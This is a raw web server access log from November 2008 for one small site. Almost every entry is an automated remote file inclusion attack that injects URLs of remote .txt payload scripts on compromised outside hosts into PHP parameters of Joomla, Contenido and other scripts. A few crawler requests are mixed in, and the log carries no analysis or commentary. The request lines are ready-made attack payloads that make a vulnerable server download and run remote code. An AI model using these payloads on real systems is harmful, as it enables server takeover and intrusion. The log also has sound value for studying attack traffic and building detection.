72.52.170.160 - - [19/Nov/2008:05:14:26 -0800] "GET /logs/access_081002.log/include/write.php?dir=http://vnc2009.com/idscanv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.agottahave.com"
72.52.170.160 - - [19/Nov/2008:05:14:26 -0800] "GET /include/write.php?dir=http://vnc2009.com/idscanv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.agottahave.com"
72.52.170.160 - - [19/Nov/2008:05:14:26 -0800] "GET /logs/include/write.php?dir=http://vnc2009.com/idscanv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.agottahave.com"
72.52.170.160 - - [19/Nov/2008:05:16:04 -0800] "GET /logs/access_080910.log/include/write.php?dir=http://vnc2009.com/idscanv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.agottahave.com"
209.172.44.52 - - [19/Nov/2008:05:23:26 -0800] "GET /logs/access_080910.log/include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
209.172.44.52 - - [19/Nov/2008:05:23:26 -0800] "GET /include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
209.172.44.52 - - [19/Nov/2008:05:23:26 -0800] "GET /logs/include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
209.172.44.52 - - [19/Nov/2008:05:23:59 -0800] "GET /logs/access_081002.log/include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
209.172.44.52 - - [19/Nov/2008:05:23:59 -0800] "GET /include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
209.172.44.52 - - [19/Nov/2008:05:23:59 -0800] "GET /logs/include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
209.172.44.52 - - [19/Nov/2008:05:26:23 -0800] "GET /include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
209.172.44.52 - - [19/Nov/2008:05:41:20 -0800] "GET /logs/access_080910.log/include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
89.218.85.18 - - [19/Nov/2008:05:41:38 -0800] "GET /logs/access_080926.log//index.php?DOCUMENT_ROOT=http://12.30.53.52/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
89.218.85.18 - - [19/Nov/2008:05:41:38 -0800] "GET /index.php?DOCUMENT_ROOT=http://12.30.53.52/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
89.218.85.18 - - [19/Nov/2008:05:41:38 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://12.30.53.52/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
203.116.63.71 - - [19/Nov/2008:05:48:39 -0800] "GET /logs/access_081002.log/include/write.php?dir=http://www.linden-park.de//contenido/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.agottahave.com"
203.116.63.71 - - [19/Nov/2008:05:48:40 -0800] "GET /include/write.php?dir=http://www.linden-park.de//contenido/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.agottahave.com"
203.116.63.71 - - [19/Nov/2008:05:48:41 -0800] "GET /logs/include/write.php?dir=http://www.linden-park.de//contenido/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.agottahave.com"
203.116.63.71 - - [19/Nov/2008:05:50:18 -0800] "GET /logs/access_081002.log/include/write.php?dir=http://www.linden-park.de//contenido/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.agottahave.com"
203.116.63.71 - - [19/Nov/2008:05:50:19 -0800] "GET /include/write.php?dir=http://www.linden-park.de//contenido/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.agottahave.com"
203.116.63.71 - - [19/Nov/2008:05:50:20 -0800] "GET /logs/include/write.php?dir=http://www.linden-park.de//contenido/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.agottahave.com"
24.143.139.77 - - [19/Nov/2008:06:01:56 -0800] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.agottahave.com"
83.222.23.200 - - [19/Nov/2008:06:10:11 -0800] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
89.218.85.18 - - [19/Nov/2008:06:15:17 -0800] "GET /logs/access_081002.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
89.218.85.18 - - [19/Nov/2008:06:15:18 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
89.218.85.18 - - [19/Nov/2008:06:15:18 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
203.116.63.71 - - [19/Nov/2008:06:25:00 -0800] "GET /logs/access_080910.log/include/write.php?dir=http://www.linden-park.de//contenido/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.agottahave.com"
203.116.63.71 - - [19/Nov/2008:06:25:07 -0800] "GET /logs/access_080910.log/include/write.php?dir=http://www.linden-park.de//contenido/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.agottahave.com"
24.143.139.77 - - [19/Nov/2008:06:26:47 -0800] "GET /logs/access.log/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.agottahave.com"
24.143.139.77 - - [19/Nov/2008:06:26:47 -0800] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.agottahave.com"
24.143.139.77 - - [19/Nov/2008:06:26:47 -0800] "GET /logs/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.agottahave.com"
24.143.139.77 - - [19/Nov/2008:06:27:34 -0800] "GET /logs/access_080926.log/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.agottahave.com"
83.222.23.200 - - [19/Nov/2008:06:34:47 -0800] "GET /logs/access_081002.log/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
83.222.23.200 - - [19/Nov/2008:06:34:47 -0800] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
83.222.23.200 - - [19/Nov/2008:06:34:47 -0800] "GET /logs/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
147.202.36.108 - - [19/Nov/2008:06:37:17 -0800] "GET /logs/access_080926.log/errors.php?error=http://www.alldogsgym.com/images/headers/ide.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.agottahave.com"
147.202.36.108 - - [19/Nov/2008:06:37:17 -0800] "GET /errors.php?error=http://www.alldogsgym.com/images/headers/ide.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.agottahave.com"
147.202.36.108 - - [19/Nov/2008:06:37:23 -0800] "GET /logs/errors.php?error=http://www.alldogsgym.com/images/headers/ide.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.agottahave.com"
91.121.162.129 - - [19/Nov/2008:06:42:10 -0800] "GET /logs/access_080926.log/errors.php?error=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
91.121.162.129 - - [19/Nov/2008:06:42:11 -0800] "GET /errors.php?error=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
91.121.162.129 - - [19/Nov/2008:06:42:11 -0800] "GET /logs/errors.php?error=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
91.121.162.129 - - [19/Nov/2008:06:42:29 -0800] "GET /logs/access_080926.log/errors.php?error=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
91.121.162.129 - - [19/Nov/2008:06:42:29 -0800] "GET /logs/errors.php?error=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
91.121.162.129 - - [19/Nov/2008:06:42:32 -0800] "GET /errors.php?error=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
91.121.162.129 - - [19/Nov/2008:06:43:14 -0800] "GET /logs/access_080926.log/errors.php?error=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
91.121.162.129 - - [19/Nov/2008:06:43:15 -0800] "GET /errors.php?error=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
91.121.162.129 - - [19/Nov/2008:06:43:15 -0800] "GET /logs/errors.php?error=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
83.222.23.200 - - [19/Nov/2008:06:44:06 -0800] "GET /logs/access_081004.log/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
89.186.1.54 - - [19/Nov/2008:07:21:52 -0800] "GET /logs/access_080926.log//index.php?DOCUMENT_ROOT=http://www.spidergenie.com//config/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.agottahave.com"
89.186.1.54 - - [19/Nov/2008:07:21:53 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.spidergenie.com//config/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.agottahave.com"
89.186.1.54 - - [19/Nov/2008:07:21:54 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.spidergenie.com//config/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.agottahave.com"
89.186.1.54 - - [19/Nov/2008:07:22:42 -0800] "GET /logs/access_080926.log//index.php?DOCUMENT_ROOT=http://www.spidergenie.com//config/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.agottahave.com"
89.186.1.54 - - [19/Nov/2008:07:22:42 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.spidergenie.com//config/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.agottahave.com"
89.186.1.54 - - [19/Nov/2008:07:22:43 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.spidergenie.com//config/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.agottahave.com"
64.1.215.163 - - [19/Nov/2008:07:26:21 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.agottahave.com"
64.254.233.2 - - [19/Nov/2008:07:44:45 -0800] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.agottahave.com"
64.254.233.2 - - [19/Nov/2008:08:04:29 -0800] "GET /logs/access_081002.log/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.agottahave.com"
64.254.233.2 - - [19/Nov/2008:08:04:29 -0800] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.agottahave.com"
64.254.233.2 - - [19/Nov/2008:08:04:29 -0800] "GET /logs/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.agottahave.com"
64.254.233.2 - - [19/Nov/2008:08:13:05 -0800] "GET /logs/access_081004.log/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.agottahave.com"
208.83.106.201 - - [19/Nov/2008:08:19:01 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.agottahave.com"
208.83.106.201 - - [19/Nov/2008:08:19:02 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.agottahave.com"
66.96.80.9 - - [19/Nov/2008:08:20:12 -0800] "GET /index.php?DOCUMENT_ROOT=http://portal2.sre.gob.mx/enlace/LANGUAGE/WS_FTP.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.agottahave.com"
66.96.80.9 - - [19/Nov/2008:08:20:13 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://portal2.sre.gob.mx/enlace/LANGUAGE/WS_FTP.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.agottahave.com"
70.84.3.50 - - [19/Nov/2008:08:28:45 -0800] "GET /index.php?/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%20%22/contenido/includes%22http://www.geocities.com/rif_q20/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.agottahave.com"
70.84.3.50 - - [19/Nov/2008:08:28:45 -0800] "GET /logs/index.php?/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%20%22/contenido/includes%22http://www.geocities.com/rif_q20/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.agottahave.com"
70.84.3.50 - - [19/Nov/2008:08:33:23 -0800] "GET /logs/index.php?//galeria.php?start=0&kategoria=%20/galeria.php?start=0&kategoria=http://www.geocities.com/rif_q20/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.agottahave.com"
70.84.3.50 - - [19/Nov/2008:08:33:23 -0800] "GET /index.php?//galeria.php?start=0&kategoria=%20/galeria.php?start=0&kategoria=http://www.geocities.com/rif_q20/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.agottahave.com"
70.84.3.50 - - [19/Nov/2008:08:34:50 -0800] "GET /index3.php?/includes/header.php?c_temp_path=%20%22/header.php%22http://www.geocities.com/rif_q20/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.agottahave.com"
70.84.3.50 - - [19/Nov/2008:08:34:50 -0800] "GET /logs/index3.php?/includes/header.php?c_temp_path=%20%22/header.php%22http://www.geocities.com/rif_q20/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.agottahave.com"
222.233.52.18 - - [19/Nov/2008:08:36:41 -0800] "GET /logs/?DOCUMENT_ROOT=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 200 1653 "-" "Mozilla/5.0" "www.agottahave.com"
222.233.52.18 - - [19/Nov/2008:08:36:42 -0800] "GET /logs/access_081002.log%20%20/?DOCUMENT_ROOT=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
222.233.52.18 - - [19/Nov/2008:08:38:36 -0800] "GET /logs/access_080925.log%20%20/?DOCUMENT_ROOT=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
89.111.176.122 - - [19/Nov/2008:08:39:06 -0800] "GET /logs/access_081002.log/home.php?pagina=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
89.111.176.122 - - [19/Nov/2008:08:39:06 -0800] "GET /home.php?pagina=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
89.111.176.122 - - [19/Nov/2008:08:39:07 -0800] "GET /logs/home.php?pagina=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
89.111.176.122 - - [19/Nov/2008:08:40:13 -0800] "GET /logs/access_080924.log/home.php?pagina=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
222.233.52.18 - - [19/Nov/2008:08:41:53 -0800] "GET /logs/access_081002.log%20%20/?DOCUMENT_ROOT=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
222.233.52.18 - - [19/Nov/2008:08:41:54 -0800] "GET /logs/?DOCUMENT_ROOT=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 200 1653 "-" "Mozilla/5.0" "www.agottahave.com"
222.233.52.18 - - [19/Nov/2008:08:42:46 -0800] "GET /logs/access_081002.log%20%20/?DOCUMENT_ROOT=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
222.233.52.18 - - [19/Nov/2008:08:42:46 -0800] "GET /logs/?DOCUMENT_ROOT=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 200 1653 "-" "Mozilla/5.0" "www.agottahave.com"
222.233.52.18 - - [19/Nov/2008:08:43:33 -0800] "GET /logs/access_080925.log%20%20/?DOCUMENT_ROOT=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
222.233.52.18 - - [19/Nov/2008:08:44:31 -0800] "GET /logs/access_080925.log%20%20/?DOCUMENT_ROOT=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
74.55.13.210 - - [19/Nov/2008:08:48:51 -0800] "GET /ashnews.php?pathtoashnews=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.agottahave.com"
70.84.3.50 - - [19/Nov/2008:08:49:01 -0800] "GET /logs/index3.php?/path/includes/init.php?includepath=%20%22/debug.php%22http://www.geocities.com/rif_q20/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.agottahave.com"
70.84.3.50 - - [19/Nov/2008:08:49:01 -0800] "GET /index3.php?/path/includes/init.php?includepath=%20%22/debug.php%22http://www.geocities.com/rif_q20/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.agottahave.com"
74.55.13.210 - - [19/Nov/2008:08:50:27 -0800] "GET /logs/access_081002.log//ashnews.php?pathtoashnews=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.agottahave.com"
74.55.13.210 - - [19/Nov/2008:08:50:27 -0800] "GET /ashnews.php?pathtoashnews=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.agottahave.com"
74.55.13.210 - - [19/Nov/2008:08:50:27 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.agottahave.com"
70.84.3.50 - - [19/Nov/2008:08:56:47 -0800] "GET /home.php?/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%20%22/contenido/includes%22http://www.geocities.com/rif_q20/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.agottahave.com"
70.84.3.50 - - [19/Nov/2008:08:56:47 -0800] "GET /logs/home.php?/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%20%22/contenido/includes%22http://www.geocities.com/rif_q20/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.agottahave.com"
74.55.13.210 - - [19/Nov/2008:09:00:33 -0800] "GET /logs/access_080926.log//ashnews.php?pathtoashnews=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.agottahave.com"
66.249.73.133 - - [19/Nov/2008:09:01:36 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.agottahave.com"
66.249.73.133 - - [19/Nov/2008:09:01:36 -0800] "GET /logs/scripts.log HTTP/1.1" 200 220 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.agottahave.com"
70.84.3.50 - - [19/Nov/2008:09:09:43 -0800] "GET /?custompluginfile[]=http://www.geocities.com/rif_q20/test.txt??? HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.agottahave.com"
70.84.3.50 - - [19/Nov/2008:09:09:43 -0800] "GET /logs/?custompluginfile[]=http://www.geocities.com/rif_q20/test.txt??? HTTP/1.1" 200 1653 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.agottahave.com"
70.84.3.50 - - [19/Nov/2008:09:15:54 -0800] "GET /file.php?/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%20%22/contenido/includes%22http://www.geocities.com/rif_q20/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.agottahave.com"
70.84.3.50 - - [19/Nov/2008:09:15:55 -0800] "GET /logs/file.php?/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%20%22/contenido/includes%22http://www.geocities.com/rif_q20/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.agottahave.com"
70.84.3.50 - - [19/Nov/2008:09:16:41 -0800] "GET /config.php?/path/includes/init.php?includepath=%20%22/debug.php%22http://www.geocities.com/rif_q20/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.agottahave.com"
70.84.3.50 - - [19/Nov/2008:09:16:41 -0800] "GET /logs/config.php?/path/includes/init.php?includepath=%20%22/debug.php%22http://www.geocities.com/rif_q20/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.agottahave.com"
67.15.234.116 - - [19/Nov/2008:09:38:16 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.agottahave.com"
208.111.154.15 - - [19/Nov/2008:09:45:13 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.agottahave.com"
208.111.154.16 - - [19/Nov/2008:09:45:20 -0800] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.agottahave.com"
67.15.234.116 - - [19/Nov/2008:10:07:50 -0800] "GET /logs/access_080911.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.agottahave.com"
67.15.234.116 - - [19/Nov/2008:10:07:50 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.agottahave.com"
67.15.234.116 - - [19/Nov/2008:10:07:50 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.agottahave.com"
66.249.73.133 - - [19/Nov/2008:10:10:56 -0800] "GET /logs/ HTTP/1.1" 200 1510 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.agottahave.com"
74.55.13.210 - - [19/Nov/2008:10:21:11 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.agottahave.com"
83.222.23.200 - - [19/Nov/2008:10:28:27 -0800] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
74.55.13.210 - - [19/Nov/2008:10:29:33 -0800] "GET /logs/access_081002.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.agottahave.com"
74.55.13.210 - - [19/Nov/2008:10:29:33 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.agottahave.com"
74.55.13.210 - - [19/Nov/2008:10:29:33 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.agottahave.com"
83.222.23.200 - - [19/Nov/2008:10:46:40 -0800] "GET /logs/access.log/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
83.222.23.200 - - [19/Nov/2008:10:46:40 -0800] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
83.222.23.200 - - [19/Nov/2008:10:46:40 -0800] "GET /logs/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
83.222.23.200 - - [19/Nov/2008:10:47:13 -0800] "GET /logs/access_080926.log/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
74.55.13.210 - - [19/Nov/2008:10:57:35 -0800] "GET /logs/access_081003.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.agottahave.com"
